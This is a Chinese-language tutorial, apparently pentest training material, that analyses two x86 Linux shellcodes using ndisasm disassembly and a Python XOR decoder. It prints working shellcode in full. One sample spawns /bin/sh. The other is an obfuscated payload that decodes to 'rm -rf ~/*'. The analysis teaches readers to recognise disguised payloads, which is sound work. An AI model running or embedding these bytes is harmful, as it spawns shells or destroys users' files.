下面,我們將分析幾個已有的shellcode的功能,通過分析,了解shellcode分析的技巧。
第一個shellcode代碼如下:
- static char shellcode[]=
- "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
- "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
- "\x2f\x73\x68\x58";
使用ndisasm反匯編結果如下:
- root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
- 00000000 EB17 jmp short 0x19
- 00000002 5E pop esi
- 00000003 897608 mov [esi+0x8],esi
- 00000006 31C0 xor eax,eax
- 00000008 884607 mov [esi+0x7],al
- 0000000B 89460C mov [esi+0xc],eax
- 0000000E B00B mov al,0xb
- 00000010 89F3 mov ebx,esi
- 00000012 8D4E08 lea ecx,[esi+0x8]
- 00000015 31D2 xor edx,edx
- 00000017 CD80 int 0x80
- 00000019 E8E4FFFFFF call dword 0x2
- 0000001E 2F das
- 0000001F 62696E bound ebp,[ecx+0x6e]
- 00000022 2F das
- 00000023 7368 jnc 0x8d
- 00000025 58 pop eax
- root@linux:~/pentest#
可以看出,這是一個執行“/bin/sh”的shellcode。
第二個shellcode代碼如下:
- char shellcode2[] =
- "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
- "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
- "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
- "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
- "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
- "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
- "\x7b\x35";
下面使用ndisasm反匯編,結果如下:
- root@linux:~/pentest# echo -ne
- "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
- 00000000 EB10 jmp short 0x12
- 00000002 5E pop esi
- 00000003 31C9 xor ecx,ecx
- 00000005 B14B mov cl,0x4b
- 00000007 B0FF mov al,0xff
- 00000009 3006 xor [esi],al
- 0000000B FEC8 dec al
- 0000000D 46 inc esi
- 0000000E E2F9 loop 0x9
- 00000010 EB05 jmp short 0x17
- 00000012 E8EBFFFFFF call dword 0x2
- 00000017 17 pop ss
- 00000018 DB db 0xdb
- 00000019 FD std
- 0000001A FC cld
- 0000001B FB sti
- 0000001C D59B aad 0x9b
- 0000001E 91 xchg eax,ecx
- 0000001F 99 cdq
- 00000020 D9869CF38199 fld dword [esi-0x667e0c64]
- 00000026 F0C28DED lock ret 0xed8d
- 0000002A 9E sahf
- 0000002B 86CA xchg cl,dl
- 0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
- 00000033 C9 leave
- 00000034 C2D3DE ret 0xded3
- 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
- 0000003D AC lodsb
- 0000003E B4BB mov ah,0xbb
- 00000040 D6 salc
- 00000041 88E5 mov ch,ah
- 00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
- 00000049 40 inc eax
- 0000004A 91 xchg eax,ecx
- 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
- 00000052 2F das
- 00000053 4A dec edx
- 00000054 23F0 and esi,eax
- 00000056 120F adc cl,[edi]
- 00000058 B570 mov ch,0x70
- 0000005A 3C32 cmp al,0x32
- 0000005C 7988 jns 0xffffffe6
- 0000005E 78F7 js 0x57
- 00000060 7B35 jpo 0x97
- root@linux:~/pentest#
接下來,我們將使用一個python腳本和hexdump來分析這個shellcode。
- root@linux:~/pentest# cat decode.py
- #!/usr/bin/env python
- sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
- "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
- "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
- "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
- "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
- "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
- "\x7b\x35"
- print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
- root@linux:~/pentest# ./decode.py | hexdump -C
- 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
- 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
- 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
- 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
- 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
- 0000004c
- root@linux:~/pentest#
可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”幾條指令,接下來我們使用ndisasm分析:
- root@linux:~/pentest# ./decode.py | ndisasm -u -
- 00000000 E825000000 call dword 0x2a
- 00000005 2F das
- 00000006 62696E bound ebp,[ecx+0x6e]
- 00000009 2F das
- 0000000A 7368 jnc 0x74
- 0000000C 007368 add [ebx+0x68],dh
- 0000000F 002D6300726D add [dword 0x6d720063],ch
- 00000015 202D7266207E and [dword 0x7e206672],ch
- 0000001B 2F das
- 0000001C 2A20 sub ah,[eax]
- 0000001E 323E xor bh,[esi]
- 00000020 2F das
- 00000021 6465762F gs jna 0x54
- 00000025 6E outsb
- 00000026 756C jnz 0x94
- 00000028 6C insb
- 00000029 005D31 add [ebp+0x31],bl
- 0000002C C0508D5D rcl byte [eax-0x73],0x5d
- 00000030 0E push cs
- 00000031 53 push ebx
- 00000032 8D5D0B lea ebx,[ebp+0xb]
- 00000035 53 push ebx
- 00000036 8D5D08 lea ebx,[ebp+0x8]
- 00000039 53 push ebx
- 0000003A 89EB mov ebx,ebp
- 0000003C 89E1 mov ecx,esp
- 0000003E 31D2 xor edx,edx
- 00000040 B00B mov al,0xb
- 00000042 CD80 int 0x80
- 00000044 89C3 mov ebx,eax
- 00000046 31C0 xor eax,eax
- 00000048 40 inc eax
- 00000049 CD80 int 0x80
- 0000004B 0A db 0x0a
- root@linux:~/pentest#